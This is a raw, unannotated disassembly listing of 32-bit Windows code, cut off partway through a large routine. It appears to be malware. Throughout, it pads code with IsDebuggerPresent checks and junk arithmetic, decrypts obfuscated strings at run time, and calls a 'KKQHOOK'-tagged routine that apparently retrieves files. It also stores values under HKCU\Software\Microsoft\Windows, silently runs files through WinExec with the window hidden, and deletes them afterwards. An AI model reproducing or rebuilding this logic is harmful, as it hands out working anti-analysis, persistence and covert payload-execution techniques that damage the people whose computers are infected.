push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_41081C ; hWnd
call SendMessageA ; SendMessageA
lea edi, [ebp+var_158]
lea esi, byte_4469B1
mov ecx, 2
rep movsd
push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_41E8BC ; hWnd
call SendMessageA ; SendMessageA
mov [ebp+var_124], 2D6Ah
inc [ebp+var_124]
push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_432DB8 ; hWnd
call SendMessageA ; SendMessageA
call GetLastError
push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_413F20 ; hWnd
call SendMessageA ; SendMessageA
lea edi, [ebp+var_15D]
lea esi, byte_4469B9
mov ecx, 5
rep movsb
push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_4351D8 ; hWnd
call SendMessageA ; SendMessageA
call GetCurrentProcessId ; GetCurrentProcessId
push 1 ; lParam
push ebx ; wParam
push 30h ; Msg
push dword_4351DC ; hWnd
call SendMessageA ; SendMessageA
call IsDebuggerPresent ; IsDebuggerPresent
push 0FFFFFFFCh ; nIndex
push dword_432DC0 ; hWnd
call GetWindowLongA ; GetWindowLongA
mov dword_41F9F4, eax
mov [ebp+var_126], 1283h
inc [ebp+var_126]
push offset sub_40B2CA ; dwNewLong
push 0FFFFFFFCh ; nIndex
push dword_432DC0 ; hWnd
call SetWindowLongA ; SetWindowLongA
lea edi, [ebp+var_163]
lea esi, word_4469BE
mov ecx, 3
rep movsw
push 0FFFFFFFCh ; nIndex
push dword_41E8C4 ; hWnd
call GetWindowLongA ; GetWindowLongA
mov dword_41E8C0, eax
push offset sub_40B2CA ; dwNewLong
push 0FFFFFFFCh ; nIndex
push dword_41E8C4 ; hWnd
call SetWindowLongA ; SetWindowLongA
call GetProcessHeap ; GetProcessHeap
push 0FFFFFFFCh ; nIndex
push dword_41081C ; hWnd
call GetWindowLongA ; GetWindowLongA
mov dword_40E078, eax
mov [ebp+var_12C], 373Eh
inc [ebp+var_12C]
push offset sub_40B2CA ; dwNewLong
push 0FFFFFFFCh ; nIndex
push dword_41081C ; hWnd
call SetWindowLongA ; SetWindowLongA
push 0FFFFFFFCh ; nIndex
push dword_41E8BC ; hWnd
call GetWindowLongA ; GetWindowLongA
mov dword_413F1C, eax
call IsDebuggerPresent ; IsDebuggerPresent
push offset sub_40B2CA ; dwNewLong
push 0FFFFFFFCh ; nIndex
push dword_41E8BC ; hWnd
call SetWindowLongA ; SetWindowLongA
call GetLastError
push dword_432DC0 ; hWnd
call SetFocus ; SetFocus
pop edi
pop esi
pop ebx
leave
retn
sub_408ED0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4098A8(LPVOID)
sub_4098A8 proc near ; DATA XREF: sub_40AA24+80F�o
var_5614 = dword ptr -5614h
var_5610 = dword ptr -5610h
var_5609 = byte ptr -5609h
var_5602 = word ptr -5602h
var_5600 = dword ptr -5600h
var_55FA = byte ptr -55FAh
var_55F9 = byte ptr -55F9h
var_55F8 = dword ptr -55F8h
var_55F4 = dword ptr -55F4h
lpString = dword ptr -55F0h
NumberOfBytesWritten= dword ptr -55ECh
var_55E6 = dword ptr -55E6h
var_55E1 = byte ptr -55E1h
var_55DC = dword ptr -55DCh
var_55D6 = dword ptr -55D6h
var_472D = byte ptr -472Dh
var_472C = byte ptr -472Ch
var_4724 = byte ptr -4724h
var_471F = byte ptr -471Fh
var_4718 = dword ptr -4718h
var_4714 = byte ptr -4714h
var_470C = dword ptr -470Ch
var_4708 = dword ptr -4708h
var_4702 = byte ptr -4702h
var_4701 = byte ptr -4701h
var_4700 = word ptr -4700h
var_46FE = word ptr -46FEh
var_46FC = dword ptr -46FCh
var_46F5 = byte ptr -46F5h
var_46F4 = byte ptr -46F4h
var_46F0 = dword ptr -46F0h
hObject = dword ptr -46ECh
var_46E6 = word ptr -46E6h
var_46E4 = dword ptr -46E4h
var_46E0 = dword ptr -46E0h
var_46DA = byte ptr -46DAh
hFile = dword ptr -45E8h
var_45E4 = dword ptr -45E4h
var_45E0 = dword ptr -45E0h
Format = byte ptr -45DBh
CmdLine = byte ptr -45D7h
var_35DF = byte ptr -35DFh
var_35DE = byte ptr -35DEh
var_35DD = byte ptr -35DDh
var_35DC = dword ptr -35DCh
var_35D8 = dword ptr -35D8h
var_35D2 = word ptr -35D2h
var_35D0 = word ptr -35D0h
var_35CE = byte ptr -35CEh
var_35CD = dword ptr -35CDh
var_25CE = word ptr -25CEh
var_25CC = dword ptr -25CCh
var_25C5 = byte ptr -25C5h
Src = byte ptr -25C4h
var_25C1 = byte ptr -25C1h
var_25BF = byte ptr -25BFh
var_15D0 = dword ptr -15D0h
var_15CC = dword ptr -15CCh
var_15C6 = byte ptr -15C6h
var_15C5 = byte ptr -15C5h
var_15C2 = word ptr -15C2h
var_15C0 = dword ptr -15C0h
var_15BC = dword ptr -15BCh
lpSubKey = dword ptr -15B8h
var_1163 = byte ptr -1163h
var_1162 = dword ptr -1162h
var_115E = byte ptr -115Eh
var_1158 = byte ptr -1158h
var_1155 = byte ptr -1155h
Type = dword ptr -1154h
var_114D = byte ptr -114Dh
var_1146 = byte ptr -1146h
var_1145 = byte ptr -1145h
var_1140 = dword ptr -1140h
var_113C = byte ptr -113Ch
var_113B = byte ptr -113Bh
var_1134 = byte ptr -1134h
var_112E = word ptr -112Eh
Source = byte ptr -112Bh
cbData = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_101F = byte ptr -101Fh
var_101E = word ptr -101Eh
var_101C = dword ptr -101Ch
Data = byte ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = byte ptr -1010h
hMem = dword ptr -0F0Ch
Dest = byte ptr -0F08h
var_708 = dword ptr -708h
var_703 = byte ptr -703h
var_604 = dword ptr -604h
Dst = byte ptr -600h
var_5A8 = byte ptr -5A8h
var_5A7 = byte ptr -5A7h
FileName = byte ptr -400h
push ebp
mov ebp, esp
mov eax, 5614h
call sub_40C6B8
push ebx
push esi
push edi
call GetVersion ; GetVersion
mov ax, word_4469C4
mov [ebp+var_112E+1], ax
lea edi, [ebp+var_1134]
lea esi, word_4469C6
mov ecx, 7
rep movsb
lea edi, [ebp+var_113B]
lea esi, byte_4469CD
mov ecx, 7
rep movsb
lea edi, [ebp+var_113C]
lea esi, byte_4469D4
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_4469D5
mov [ebp+var_1140], eax
lea edi, [ebp+var_1145]
lea esi, byte_4469D9
mov ecx, 5
rep movsb
call GetTickCount ; GetTickCount
push eax ; Seed
call srand ; srand
pop ecx
mov [ebp+var_101C], 6594h
inc [ebp+var_101C]
loc_40993B: ; CODE XREF: sub_4098A8+1108�j
lea edi, [ebp+var_1146]
lea esi, byte_4469DE
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_43C094
add eax, 3
push eax
lea eax, [ebp+var_703]
push eax
call sub_40172F
push 9 ; Size
push offset byte_446D1F ; Src
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
call IsDebuggerPresent ; IsDebuggerPresent
lea eax, [ebp+FileName]
push eax
call sub_40341E
mov [ebp+var_101E], 5439h
sub [ebp+var_101E], 33A0h
lea edi, [ebp+var_114D]
lea esi, byte_4469DF
mov ecx, 7
rep movsb
push 9 ; Size
push offset byte_446D15 ; Src
call sub_40129C
mov edi, dword_43C0BC
push off_43C0C4[edi*4]
push eax ; Format
lea edi, [ebp+Dest]
push edi ; Dest
call sprintf ; sprintf
push 1 ; Size
push offset byte_446D13 ; Src
call sub_40129C
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
mov edi, dword_43C0BC
push off_43C0C4[edi*4]
call sub_40181A
add esp, 4Ch
cmp eax, 0FFFFh
jnz short loc_409A33
push 9 ; Size
push offset byte_446D09 ; Src
call sub_40129C
push eax ; Source
lea edi, [ebp+Dest]
push edi ; Dest
call strcat ; strcat
add esp, 10h
loc_409A33: ; CODE XREF: sub_4098A8+16D�j
call IsDebuggerPresent ; IsDebuggerPresent
and dword ptr [ebp+Data], 0
mov [ebp+cbData], 4
lea edi, [ebp+var_1155]
lea esi, byte_4469E6
xor ecx, ecx
inc ecx
rep movsb
push 1Ah ; Size
push offset aZAgJIsJZAigGz ; "‡»² £µ¦±ˆ™½·¦»§»² ˆƒ½º°»£§"
call sub_40129C
mov [ebp+lpSubKey], eax
push 3 ; Size
push offset word_446CEA ; Src
call sub_40129C
lea edi, [ebp+Type]
push edi ; lpType
lea edi, [ebp+cbData]
push edi ; lpcbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
mov edi, [ebp+lpSubKey]
push edi ; lpSubKey
push 80000001h ; hKey
call sub_4014C9
mov [ebp+var_101F], 6Ah
add [ebp+var_101F], 1
lea edi, [ebp+var_1158]
lea esi, byte_4469E7
mov ecx, 3
rep movsb
push 7 ; Size
push offset word_446CE2 ; Src
call sub_40129C
push dword ptr [ebp+Data]
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
call GetLastError
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call strcat ; strcat
mov [ebp+var_1024], 7ED9h
mov eax, 39E6h
mul [ebp+var_1024]
mov [ebp+var_15BC], eax
mov [ebp+var_1024], eax
push 1 ; Size
push offset byte_446CE0 ; Src
call sub_40129C
lea edi, [ebp+var_604]
push edi ; int
push 0 ; int
push 0 ; int
push eax ; int
push offset ClassName ; "KKQHOOK"
lea edi, [ebp+FileName]
push edi ; lpFileName
lea edi, [ebp+Dest]
push edi ; int
push 0 ; hMem
call sub_4061F7
add esp, 6Ch
mov ebx, eax
mov [ebp+var_1028], 47D6h
mov eax, 2DD7h
mul [ebp+var_1028]
mov [ebp+var_15C0], eax
mov [ebp+var_1028], eax
or ebx, ebx
jnz short loc_409BA8
call GetCurrentProcessId ; GetCurrentProcessId
lea eax, [ebp+FileName]
push eax
call sub_40349A
pop ecx
mov [ebp+var_15C2], 2655h
movzx eax, [ebp+var_15C2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_15C2], ax
jmp loc_40A8A0
; ---------------------------------------------------------------------------
loc_409BA8: ; CODE XREF: sub_4098A8+2CA�j
and dword ptr [ebp+Data], 0
push 1Ah ; Size
push offset aZAgJIsJZAigGz ; "‡»² £µ¦±ˆ™½·¦»§»² ˆƒ½º°»£§"
call sub_40129C
mov [ebp-15C4h], eax
push 3 ; Size
push offset word_446CEA ; Src
call sub_40129C
push 4 ; dwType
push 4 ; cbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
mov edi, [ebp-15C4h]
push edi ; lpSubKey
push 80000001h ; hKey
call sub_40160A
push 0 ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_401A7E
add esp, 30h
mov [ebp+hMem], eax
or eax, eax
jz loc_40A8A0
lea edi, [ebp+var_115E]
lea esi, aOcqud ; "ocqUd"
mov ecx, 3
rep movsw
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
lea eax, [ebp+FileName]
push eax
call sub_40349A
pop ecx
and [ebp+var_708], 0
jmp loc_40A867
; ---------------------------------------------------------------------------
loc_409C42: ; CODE XREF: sub_4098A8+FE2�j
mov ax, word_4469F0
mov [ebp+var_35D0], ax
cmp [ebp+Dst], 0
jz loc_40A867
call GetCurrentProcessId ; GetCurrentProcessId
lea ecx, [ebp+Dst]
or eax, 0FFFFFFFFh
loc_409C6A: ; CODE XREF: sub_4098A8+3C7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409C6A
cmp eax, 5Ch
jb loc_40A867
mov [ebp+var_25C5], 9Bh
movzx eax, [ebp+var_25C5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_25C5], al
mov [ebp+var_5A8], 0
mov ax, word_4469F2
mov [ebp+var_35D2], ax
push 0FFFh
lea eax, [ebp+Src]
push eax
lea eax, [ebp+var_5A7]
push eax
call sub_40893E
push 0FFFh
lea eax, [ebp+var_35CD]
push eax
lea eax, [ebp+Dst]
push eax
call sub_40893E
add esp, 18h
mov [ebp+var_25CC], 1FCCh
mov eax, [ebp+var_25CC]
mov edx, eax
add edx, eax
mov [ebp+var_25CC], edx
mov [ebp+var_15C6], 0
mov [ebp+var_25CE], 35D8h
movzx eax, [ebp+var_25CE]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_25CE], ax
mov [ebp+var_15C5], 0
jmp short loc_409D40
; ---------------------------------------------------------------------------
loc_409D22: ; CODE XREF: sub_4098A8+4B1�j
movzx eax, [ebp+var_15C5]
lea edx, [ebp+eax+Src]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add [ebp+var_15C5], 1
loc_409D40: ; CODE XREF: sub_4098A8+478�j
lea ecx, [ebp+Src]
or eax, 0FFFFFFFFh
loc_409D49: ; CODE XREF: sub_4098A8+4A6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409D49
movzx esi, [ebp+var_15C5]
cmp esi, eax
jb short loc_409D22
mov [ebp+var_35CE], 4
add [ebp+var_35CE], 1
lea ecx, [ebp+Src]
or eax, 0FFFFFFFFh
loc_409D72: ; CODE XREF: sub_4098A8+4CF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409D72
lea esi, [ebp+var_35CD]
push esi ; int
push eax ; Size
lea edi, [ebp+Src]
push edi ; Src
call sub_408779
add esp, 0Ch
mov [ebp+var_35D8], eax
push 5 ; Size
push offset word_446CDA ; Src
call sub_40129C
add esp, 8
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+Src]
push edi
call sub_40181A
add esp, 0Ch
cmp eax, 0
jnz loc_40A2DE
mov [ebp+var_46E4], 234h
mov eax, [ebp+var_46E4]
mov edx, eax
add edx, eax
mov [ebp+var_46E4], edx
mov eax, dword_4469F4
mov [ebp+var_470C], eax
lea edi, [ebp+var_4714]
lea esi, dword_4469F8
mov ecx, 8
rep movsb
lea eax, [ebp+var_25BF]
push eax
lea eax, [ebp+Format]
push eax
call sub_40C6D8
call IsDebuggerPresent ; IsDebuggerPresent
mov [ebp+var_35DC], 0
mov [ebp+var_46E0], 4
lea eax, [ebp+var_46F4]
push eax ; lpType
lea eax, [ebp+var_46E0]
push eax ; lpcbData
lea eax, [ebp+var_35DC]
push eax ; lpData
push offset ValueName ; "ofstkkq"
push offset SubKey ; "Software\\Microsoft\\Windows"
push 80000001h ; hKey
call sub_4014C9
add esp, 18h
mov [ebp+var_46F5], 9Dh
movzx eax, [ebp+var_46F5]
imul eax, 3388h
mov [ebp+var_46F5], al
mov eax, dword_43C094
add eax, 3
push eax
lea eax, [ebp+var_703]
push eax
call sub_40172F
add esp, 8
push 9 ; Size
push offset byte_446D1F ; Src
call sub_40129C
add esp, 8
lea edi, [ebp+var_703]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
add esp, 10h
call GetLastError
push 1 ; Size
push offset byte_446CE0 ; Src
call sub_40129C
add esp, 8
lea edi, [ebp+var_604]
push edi ; int
push 0 ; int
push 0 ; int
push eax ; int
push offset ClassName ; "KKQHOOK"
lea edi, [ebp+FileName]
push edi ; lpFileName
lea edi, [ebp+Format]
push edi ; int
push offset byte_41FA00 ; hMem
call sub_4061F7
add esp, 20h
mov ebx, eax
call GetLastError
cmp ebx, 0
jnz short loc_409F27
mov [ebp+var_472D], 69h
add [ebp+var_472D], 1
lea eax, [ebp+FileName]
push eax
call sub_40349A
add esp, 4
call GetVersion ; GetVersion
jmp short loc_409F60
; ---------------------------------------------------------------------------
loc_409F27: ; CODE XREF: sub_4098A8+659�j
push 4 ; dwType
push 4 ; cbData
lea eax, [ebp+var_604]
push eax ; lpData
push offset ValueName ; "ofstkkq"
push offset SubKey ; "Software\\Microsoft\\Windows"
push 80000001h ; hKey
call sub_40160A
mov eax, dword_446A00
mov [ebp+var_4718], eax
lea eax, [ebp+FileName]
push eax
call sub_40349A
add esp, 1Ch
loc_409F60: ; CODE XREF: sub_4098A8+67D�j
and [ebp+var_35DC], 0
mov [ebp+var_46E0], 4
call GetProcessHeap ; GetProcessHeap
lea eax, [ebp+var_46F4]
push eax ; lpType
lea eax, [ebp+var_46E0]
push eax ; lpcbData
lea eax, [ebp+var_35DC]
push eax ; lpData
push offset aOfstkkqc ; "ofstkkqc"
push offset SubKey ; "Software\\Microsoft\\Windows"
push 80000001h ; hKey
call sub_4014C9
add esp, 18h
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
push offset byte_40E080 ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 0 ; lpFileSizeHigh
push eax ; hFile
call GetFileSize ; GetFileSize
mov [ebp+var_4708], eax
call GetVersion ; GetVersion
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
call GetLastError
mov eax, [ebp+var_4708]
cmp [ebp+var_35DC], eax
jb short loc_409FFC
call GetProcessHeap ; GetProcessHeap
jmp loc_40A157
; ---------------------------------------------------------------------------
loc_409FFC: ; CODE XREF: sub_4098A8+748�j
lea edi, [ebp+var_471F]
lea esi, dword_446A04
mov ecx, 7
rep movsb
mov eax, 1Ah
sub eax, dword_43C098
push eax
lea eax, [ebp+var_46DA]
push eax
call sub_40172F
push 9 ; Size
push offset dword_446CD0 ; Src
call sub_40129C
lea edi, [ebp+var_46DA]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
call IsDebuggerPresent ; IsDebuggerPresent
lea eax, [ebp+FileName]
push eax
call sub_40341E
mov [ebp+var_46FC], 3814h
add [ebp+var_46FC], 12E1h
push 1 ; Size
push offset byte_446CE0 ; Src
call sub_40129C
lea edi, [ebp+var_604]
push edi ; int
push 0 ; int
push [ebp+var_35DC] ; int
push eax ; int
push offset ClassName ; "KKQHOOK"
lea edi, [ebp+FileName]
push edi ; lpFileName
lea edi, [ebp+Format]
push edi ; int
push offset byte_40E080 ; hMem
call sub_4061F7
mov ebx, eax
mov [ebp+var_46FE], 486Fh
movzx eax, [ebp+var_46FE]
imul eax, 20EDh
mov [ebp+var_46FE], ax
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
lea edi, [ebp+var_4724]
lea esi, byte_446A0B
mov ecx, 5
rep movsb
lea eax, [ebp+FileName]
push eax
call sub_40349A
add esp, 50h
mov [ebp+var_4700], 1BDh
movzx eax, [ebp+var_4700]
imul eax, 1736h
mov [ebp+var_4700], ax
or ebx, ebx
jz short loc_40A157
mov dword ptr [ebp-4730h], 1381h
sub dword ptr [ebp-4730h], 2095h
cmp [ebp+var_604], 0
jz short loc_40A157
push 4 ; dwType
push 4 ; cbData
lea eax, [ebp+var_604]
push eax ; lpData
push offset aOfstkkqc ; "ofstkkqc"
push offset SubKey ; "Software\\Microsoft\\Windows"
push 80000001h ; hKey
call sub_40160A
add esp, 18h
loc_40A157: ; CODE XREF: sub_4098A8+74F�j
; sub_4098A8+86E�j ...
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
push offset byte_415080 ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+var_46F0], eax
lea edi, [ebp+var_472C]
lea esi, dword_446A10
movsd
movsd
cmp [ebp+var_46F0], 0FFFFFFFFh
jz loc_40A8A0
call GetTickCount ; GetTickCount
push [ebp+var_46F0] ; hObject
call CloseHandle ; CloseHandle
call GetTickCount ; GetTickCount
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call sprintf ; sprintf
mov [ebp+var_46E6], 4301h
movzx eax, [ebp+var_46E6]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_46E6], ax
push 6 ; Size
push offset byte_446CC9 ; Src
call sub_40129C
push eax ; Source
lea edi, [ebp+Dest]
push edi ; Dest
call strcat ; strcat
mov [ebp+var_4701], 99h
movzx eax, [ebp+var_4701]
imul eax, 2D23h
mov [ebp+var_4701], al
lea eax, [ebp+FileName]
push eax
call sub_40341E
call GetCurrentThreadId ; GetCurrentThreadId
mov eax, dword_43C094
add eax, 3
push eax
lea eax, [ebp+var_46DA]
push eax
call sub_40172F
push 9 ; Size
push offset byte_446D1F ; Src
call sub_40129C
lea edi, [ebp+var_46DA]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
mov [ebp+var_4702], 0B2h
add [ebp+var_4702], 25h
push 1 ; Size
push offset byte_446CE0 ; Src
call sub_40129C
lea edi, [ebp+var_604]
push edi ; int
push 0 ; int
push [ebp+var_35DC] ; int
push eax ; int
push offset ClassName ; "KKQHOOK"
lea edi, [ebp+FileName]
push edi ; lpFileName
lea edi, [ebp+Dest]
push edi ; int
push offset byte_415080 ; hMem
call sub_4061F7
mov ebx, eax
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
call GetCurrentProcessId ; GetCurrentProcessId
lea eax, [ebp+FileName]
push eax
call sub_40349A
add esp, 68h
call GetTickCount ; GetTickCount
or ebx, ebx
jz short loc_40A2DE
mov eax, dword_446A18
mov [ebp-4730h], eax
push offset byte_415080 ; lpFileName
call DeleteFileA ; DeleteFileA
loc_40A2DE: ; CODE XREF: sub_4098A8+51C�j
; sub_4098A8+A1F�j
cmp [ebp+Src], 3Ah
jnz loc_40A499
cmp [ebp+var_25C1], 3Ah
jnz loc_40A499
call GetCurrentProcessId ; GetCurrentProcessId
mov [ebp+var_25C1], 0
push 5 ; Size
push offset byte_446CC3 ; Src
call sub_40129C
lea edi, [ebp+var_35DC]
push edi
push eax ; Format
lea edi, [ebp+Src]
push edi ; Src
call sscanf ; sscanf
add esp, 14h
call GetVersion ; GetVersion
cmp [ebp+var_35DC], 0
jz short loc_40A35E
call rand ; rand
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_35DC]
ja loc_40A867
loc_40A35E: ; CODE XREF: sub_4098A8+A8B�j
mov [ebp+var_35DD], 36h
add [ebp+var_35DD], 1
cmp VersionInformation.dwPlatformId, 2
jnz short loc_40A3DE
mov [ebp+var_35DF], 79h
movzx eax, [ebp+var_35DF]
imul eax, 2939h
mov [ebp+var_35DF], al
push 400h ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
push 0Ah ; Size
push offset dword_446CB8 ; Src
call sub_40129C
lea edi, [ebp+FileName]
push edi
push eax ; Format
lea edi, [ebp+var_1010]
push edi ; Dest
call sprintf ; sprintf
push 8 ; Size
push offset byte_446CAF ; Src
call sub_40129C
push eax ; Source
lea edi, [ebp+FileName]
push edi ; Dest
call strcat ; strcat
add esp, 24h
jmp short loc_40A43F
; ---------------------------------------------------------------------------
loc_40A3DE: ; CODE XREF: sub_4098A8+ACB�j
call GetTickCount ; GetTickCount
push 400h ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call GetWindowsDirectoryA ; GetWindowsDirectoryA
call GetTickCount ; GetTickCount
push 0Eh ; Size
push offset dword_446CA0 ; Src
call sub_40129C
lea edi, [ebp+FileName]
push edi
push eax ; Format
lea edi, [ebp+var_1010]
push edi ; Dest
call sprintf ; sprintf
call GetCurrentProcessId ; GetCurrentProcessId
push 0Ch ; Size
push offset byte_446C93 ; Src
call sub_40129C
push eax ; Source
lea edi, [ebp+FileName]
push edi ; Dest
call strcat ; strcat
add esp, 24h
call GetCurrentProcessId ; GetCurrentProcessId
loc_40A43F: ; CODE XREF: sub_4098A8+B34�j
lea eax, [ebp+var_1010]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
call GetCurrentProcessId ; GetCurrentProcessId
push 8 ; Size
push offset word_446C8A ; Src
call sub_40129C
lea edi, [ebp+Src]
add edi, 4
push edi
lea edi, [ebp+FileName]
push edi
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
push 0 ; uCmdShow
lea eax, [ebp+FileName]
push eax ; lpCmdLine
call WinExec ; WinExec
mov [ebp+var_35DE], 3Dh
add [ebp+var_35DE], 10h
loc_40A499: ; CODE XREF: sub_4098A8+A3D�j
; sub_4098A8+A4A�j
push 5 ; Size
push offset dword_446C84 ; Src
call sub_40129C
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+Src]
push edi
call sub_40181A
add esp, 14h
or eax, eax
jnz loc_40A62C
call GetCurrentThreadId ; GetCurrentThreadId
mov [ebp+var_55DC], 1060h
sub [ebp+var_55DC], 872h
lea edi, [ebp+var_55E1]
lea esi, dword_446A1C
mov ecx, 5
rep movsb
mov eax, 19h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_703]
push eax
call sub_40172F
push 9 ; Size
push offset byte_446D1F ; Src
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+CmdLine]
push edi ; Dest
call sprintf ; sprintf
mov eax, dword_446A21
mov [ebp+var_55E6+1], eax
mov eax, dword_446A25
mov [ebp+NumberOfBytesWritten+3], eax
lea eax, [ebp+var_25BF]
push eax
lea eax, [ebp+var_55D6]
push eax
call sub_40C6D8
call GetLastError
push 3 ; Size
push offset dword_446C80 ; Src
call sub_40129C
mov [ebp+lpString], eax
push 1 ; Size
push offset byte_446CE0 ; Src
call sub_40129C
push 0 ; int
push 0 ; int
push 0 ; int
push eax ; int
mov edi, [ebp+lpString]
push edi ; lpString
lea edi, [ebp+CmdLine]
push edi ; lpFileName
lea edi, [ebp+var_55D6]
push edi ; int
push 0 ; hMem
call sub_4061F7
add esp, 50h
mov ebx, eax
lea edi, [ebp+NumberOfBytesWritten+2]
lea esi, byte_446A29
xor ecx, ecx
inc ecx
rep movsb
cmp ebx, 2
jnz short loc_40A62C
mov [ebp+var_55F4], 554Dh
mov eax, 565Ch
mul [ebp+var_55F4]
mov [ebp+var_55F8], eax
mov [ebp+var_55F4], eax
push 0 ; uCmdShow
lea eax, [ebp+CmdLine]
push eax ; lpCmdLine
call WinExec ; WinExec
push 6 ; Size
push offset byte_446C79 ; Src
call sub_40129C
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+var_55D6]
push edi
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jz short loc_40A62C
mov eax, 13h
sub eax, dword_43C098
push eax ; Code
call exit ; exit
; ---------------------------------------------------------------------------
pop ecx
loc_40A62C: ; CODE XREF: sub_4098A8+C1B�j
; sub_4098A8+D12�j ...
push 5 ; Size
push offset byte_446C73 ; Src
call sub_40129C
mov edi, 6
sub edi, dword_43C094
push edi
push eax
lea edi, [ebp+Src]
push edi
call sub_40181A
add esp, 14h
or eax, eax
jnz loc_40A867
mov ax, word_446A2A
mov [ebp+var_5602], ax
call GetTickCount ; GetTickCount
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
push offset ExistingFileName ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+hFile], eax
mov [ebp+lpString], 3Ch
add [ebp+lpString], 5583h
push 6 ; Size
push offset dword_446C6C ; Src
call sub_40129C
add esp, 8
push 0 ; lpOverlapped
lea edi, [ebp+NumberOfBytesWritten]
push edi ; lpNumberOfBytesWritten
mov edi, 18h
sub edi, dword_43C098
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
push [ebp+hFile] ; hFile
call WriteFile ; WriteFile
lea eax, [ebp+var_25BF]
push eax
lea eax, [ebp+Format]
push eax
call sub_40C6D8
mov word ptr [ebp+var_55F4+2], 1AEFh
inc word ptr [ebp+var_55F4+2]
lea ecx, [ebp+Format]
or eax, 0FFFFFFFFh
loc_40A6FD: ; CODE XREF: sub_4098A8+E5A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A6FD
mov [ebp+var_45E0], eax
mov [ebp+var_35DC], 0
jmp short loc_40A73A
; ---------------------------------------------------------------------------
loc_40A716: ; CODE XREF: sub_4098A8+E9E�j
mov eax, [ebp+var_35DC]
cmp [ebp+eax+Format], 7Ch
jnz short loc_40A734
mov eax, [ebp+var_35DC]
mov [ebp+eax+Format], 0
loc_40A734: ; CODE XREF: sub_4098A8+E7C�j
inc [ebp+var_35DC]
loc_40A73A: ; CODE XREF: sub_4098A8+E6C�j
mov eax, [ebp+var_45E0]
cmp [ebp+var_35DC], eax
jb short loc_40A716
lea edi, [ebp+var_5609]
lea esi, dword_446A2C
mov ecx, 7
rep movsb
and [ebp+var_45E4], 0
loc_40A762: ; CODE XREF: sub_4098A8+F90�j
push 1Fh ; Size
push offset dword_446C4C ; Src
call sub_40129C
mov edi, [ebp+var_45E4]
lea edi, [ebp+edi+Format]
push edi
push eax ; Format
lea edi, [ebp-55E7h]
push edi ; Dest
call sprintf ; sprintf
add esp, 14h
mov byte ptr [ebp+var_55F4+1], 0CCh
add byte ptr [ebp+var_55F4+1], 1
lea ecx, [ebp-55E7h]
or eax, 0FFFFFFFFh
loc_40A7A3: ; CODE XREF: sub_4098A8+F00�j
inc eax
